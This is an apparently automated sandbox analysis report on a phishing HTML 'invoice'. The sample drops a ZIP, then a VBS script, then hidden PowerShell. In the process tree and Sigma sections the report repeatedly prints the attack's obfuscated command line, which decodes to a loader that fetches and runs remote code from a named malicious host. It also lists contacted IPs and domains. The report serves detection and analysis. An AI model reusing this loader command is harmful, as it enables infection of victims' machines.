Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
faktura_FV2025020660849.html

Overview

General Information

Sample name:faktura_FV2025020660849.html
(renamed file extension from htm_ to html)
Original sample name:faktura_FV2025020660849.htm_
Analysis ID:1637352
MD5:467b6110a70e52f3bee6a6331cd809bd
SHA1:9588dfe44777f409bc74eb61f452c8e8b8feae92
SHA256:a4a49cc9e4542c0b845354a26f3ef4bf69065c120101d8179f512bf7507309d6
Infos:

Detection

Score:96
Range:0 - 100
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
AI detected suspicious Javascript
Detected javascript redirector / loader
Downloads suspicious files via Chrome
Found suspicious ZIP file
Obfuscated command line found
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • chrome.exe (PID: 6068 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 5756 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2060,i,3895141347888249468,9556767451129423605,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2104 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • unarchiver.exe (PID: 6660 cmdline: "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\faktura_FV2025020660849.zip" MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2)
      • 7za.exe (PID: 6720 cmdline: "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg" "C:\Users\user\Downloads\faktura_FV2025020660849.zip" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6792 cmdline: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wscript.exe (PID: 6860 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
          • cmd.exe (PID: 6216 cmdline: "C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 5660 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^|%{[char]($_/4)})-join'') ^| ^&($uNteWVUN) " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • powershell.exe (PID: 6980 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • chrome.exe (PID: 6268 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\faktura_FV2025020660849.html" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • svchost.exe (PID: 6808 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 54.39.128.117, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6860, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49705
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6792, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , ProcessId: 6860, ProcessName: wscript.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6792, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , ProcessId: 6860, ProcessName: wscript.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6792, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , ProcessId: 6860, ProcessName: wscript.exe
Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -", CommandLine: "C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 54.39.128.117, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6860, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49705
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6792, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , ProcessId: 6860, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -, CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -, CommandLine|base64offset|contains: hv, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6216, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -, ProcessId: 6980, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6808, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

  • Phishing
  • Compliance
  • Software Vulnerabilities
  • Networking
  • System Summary
  • Data Obfuscation
  • Hooking and other Techniques for Hiding and Protection
  • Malware Analysis System Evasion
  • Anti Debugging
  • HIPS / PFW / Operating System Protection Evasion
  • Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: 0.1.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates high-risk behavior, including the use of the `eval()` function to execute dynamic code. This allows for potential remote code execution, which poses a significant security risk. Additionally, the script appears to be heavily obfuscated, making it difficult to analyze and understand its true purpose. Based on these factors, the script is considered to be high-risk and should be treated with caution.
Source: faktura_FV2025020660849.htmlHTTP Parser: Low number of body elements: 0
Source: faktura_FV2025020660849.htmlHTTP Parser: No favicon
Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
Source: unknownHTTPS traffic detected: 54.39.128.117:443 -> 192.168.2.7:49705 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files\Google\Chrome\Application\chrome.exeChild: C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: chrome.exeMemory has grown: Private usage: 8MB later: 60MB

Networking

barindex
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 54.39.128.117 443Jump to behavior
Source: global trafficTCP traffic: 192.168.2.7:49693 -> 156.229.228.198:13621
Source: global trafficTCP traffic: 192.168.2.7:50482 -> 1.1.1.1:53
Source: Joe Sandbox ViewIP Address: 149.56.240.132 149.56.240.132
Source: Joe Sandbox ViewIP Address: 54.39.128.117 54.39.128.117
Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownTCP traffic detected without corresponding DNS query: 23.199.215.203
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.98.62
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 23.199.215.203
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.98.62
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.15
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.15
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.15
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.15
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.15
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.15
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.15
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /stats/0.php?4935987&@f16&@g1&@h1&@i1&@vhttps://histats.com/s_opened_TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEzNC4wLjAuMCBTYWZhcmkvNTM3LjM2 HTTP/1.1Host: s4.histats.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /stats/0.php?4935988&@f16&@g1&@h1&@i1&@vhttps://histats.com/d_opened HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s4.histats.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: s4.histats.com
Source: global trafficDNS traffic detected: DNS query: filehost200885.info
Source: global trafficDNS traffic detected: DNS query: _13621._https.filehost200885.info
Source: svchost.exe, 00000011.00000002.2834516229.00000132FF600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000011.00000002.2834795537.00000132FF6D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/
Source: qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000011.00000002.2834974179.00000132FF71B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2833920102.00000132FE902000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2834795537.00000132FF6F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1473287422.00000132FF4E2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2834795537.00000132FF6D3000.00000004.00000020.00020000.00000000.sdmp, edb.log.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adnnf2xkczyschn5rjlarpymlqwq_2025.3.12.0/
Source: qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000011.00000002.2834630104.00000132FF690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80
Source: svchost.exe, 00000011.00000002.2834630104.00000132FF690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80IO:ID:
Source: edb.log.17.dr, qmgr.db.17.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: qmgr.db.17.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000011.00000003.1207118522.00000132FF4E0000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: wscript.exe, 0000000B.00000002.2832180699.00000000038BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.0000000003416000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2833317335.00000000059B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://histats.com/d_opened
Source: wscript.exe, 0000000B.00000002.2832972295.000000000585C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://histats.com/d_opened8%
Source: wscript.exe, 0000000B.00000002.2831181995.00000000033C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://histats.com/d_opened=
Source: wscript.exe, 0000000B.00000002.2832972295.000000000585C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://histats.com/d_opened=%
Source: wscript.exe, 0000000B.00000002.2831181995.00000000033C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://histats.com/d_openedm
Source: wscript.exe, 0000000B.00000002.2832972295.000000000585C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: qmgr.db.17.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: wscript.exe, 0000000B.00000002.2831181995.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.1164820664.00000000033C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.%
Source: wscript.exe, 0000000B.00000002.2831181995.00000000033AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.com/
Source: wscript.exe, 0000000B.00000002.2831181995.00000000033AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.com/c
Source: wscript.exe, 0000000B.00000002.2831181995.00000000033AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.com/stas
Source: wscript.exe, 0000000B.00000003.1164820664.00000000033C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.com/stat8%
